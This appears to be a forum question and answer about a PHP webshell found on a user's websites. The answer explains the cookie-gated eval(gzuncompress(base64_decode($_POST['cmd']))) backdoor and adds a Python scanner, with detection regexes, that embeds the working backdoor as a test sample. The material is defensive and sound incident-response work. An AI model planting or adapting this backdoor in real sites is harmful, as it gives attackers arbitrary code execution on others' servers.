I have discovered the following code appearing in two identical .php files on more than one of my server’s websites. The files have inconspicuous names such as “reminder.php” (but a different name every time) and appear in my /scripts/ and /uploads/ folders, sometimes in other folders instead.
Their appearance is not entirely random, but I don’t know enough about Apache servers or PHP to know a) how it got there b) what it does.
Checking the logs, they all appeared at similar times and were called once and that is all.
Any help would be greatly appreciated.
if (isset($_COOKIE["adm"])) {
    if (isset($_POST['crc'], $_POST['cmd'])) {
        if (sprintf('%u', crc32($_POST['cmd'])) == $_POST['crc']) {
            eval(gzuncompress(base64_decode($_POST['cmd'])));
        } else
            echo "repeat_cmd";
    }
}
The file allows malicious person(s) to execute any PHP code they want on your system.
Basically, if certain validations have been met (i.e. the malicious person has that given cookie value), it will take the POSTed “cmd”, base64-decode it, gzip-uncompress it, and evaluate it as PHP.
I’d recommend changing your passwords, and maybe reinstalling Apache for good measure. Remove these files immediately as well, or if at all remotely possible, restore from a backup.
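As a follow-up to the answer, here is an added example (not code from the question or the answer) of how one might sweep a document root for other copies of this backdoor pattern before restoring from backup. It is a small Python scanner: the indicator names and regular expressions are assumptions chosen to match the eval/gzuncompress/base64_decode chain and the cookie gate shown in the posted snippet, not a general webshell signature set, and the two sample files embedded at the bottom are constructed for illustration (one is the posted snippet, the other a harmless page that never passes request data to eval).

```python
"""Scan .php files for the eval(gzuncompress(base64_decode($_POST[...]))) style
backdoor discussed above.  Added example; the indicator patterns below are our
own assumptions drawn from the posted snippet, not an exhaustive signature list."""
from __future__ import annotations

import re
import sys
from pathlib import Path

# Each indicator is a label of our own plus the regex that detects it.
INDICATORS = [
    # eval() applied directly to a decoding/uncompressing function.
    ("eval_of_decoded_input",
     re.compile(r"eval\s*\(\s*(?:gzuncompress|gzinflate|base64_decode|str_rot13)\s*\(", re.I)),
    # Request data ($_POST, $_GET, ...) appearing inside the same eval() call line.
    ("request_input_reaches_eval",
     re.compile(r"eval\s*\(.*\$_(?:POST|GET|COOKIE|REQUEST)\b", re.I)),
    # Execution gated on the presence of a cookie, as in the posted file.
    ("cookie_gate",
     re.compile(r"isset\s*\(\s*\$_COOKIE\s*\[", re.I)),
    # crc32 over request data, used by the backdoor as a transport check.
    ("crc32_over_request_input",
     re.compile(r"crc32\s*\(\s*\$_(?:POST|GET|COOKIE|REQUEST)\b", re.I)),
]

# Either of these alone is enough to treat a file as a probable backdoor;
# otherwise require three weaker indicators together.
HIGH_CONFIDENCE = {"eval_of_decoded_input", "request_input_reaches_eval"}


def scan_php_source(src: str) -> list[str]:
    """Return the indicator labels matched anywhere in one file's source."""
    return [name for name, rx in INDICATORS if rx.search(src)]


def is_probable_backdoor(src: str) -> bool:
    """Decide whether a file's indicator set crosses the reporting threshold."""
    hits = set(scan_php_source(src))
    return bool(hits & HIGH_CONFIDENCE) or len(hits) >= 3


def scan_tree(root: str) -> dict[str, list[str]]:
    """Walk a document root and map each suspicious .php path to its indicators."""
    findings: dict[str, list[str]] = {}
    for path in Path(root).rglob("*.php"):
        try:
            src = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the sweep
        if is_probable_backdoor(src):
            findings[str(path)] = scan_php_source(src)
    return findings


# Constructed samples for a self-test: the snippet from the question, and a
# harmless page that decodes nothing and never evaluates request data.
WEBSHELL_SAMPLE = """<?php
if (isset($_COOKIE["adm"])) {
    if (isset($_POST['crc'], $_POST['cmd'])) {
        if (sprintf('%u', crc32($_POST['cmd'])) == $_POST['crc']) {
            eval(gzuncompress(base64_decode($_POST['cmd'])));
        } else
            echo "repeat_cmd";
    }
}
"""

BENIGN_SAMPLE = """<?php
$name = htmlspecialchars($_GET['name'] ?? 'world');
echo "Hello, $name";
"""

if __name__ == "__main__":
    # Usage: python scan_backdoors.py /path/to/docroot
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, hits in scan_tree(root).items():
        print(f"{path}: {', '.join(hits)}")
```

Because the backdoor is invoked with a POST and the command body never appears in the Apache access log, the log only tells you which file was hit and when; the source scan above is what finds the other copies, and any hit should be compared against a known-good copy of the site rather than simply deleted, so the directory it landed in (here /uploads/ or /scripts/) can also be checked for how the write was possible.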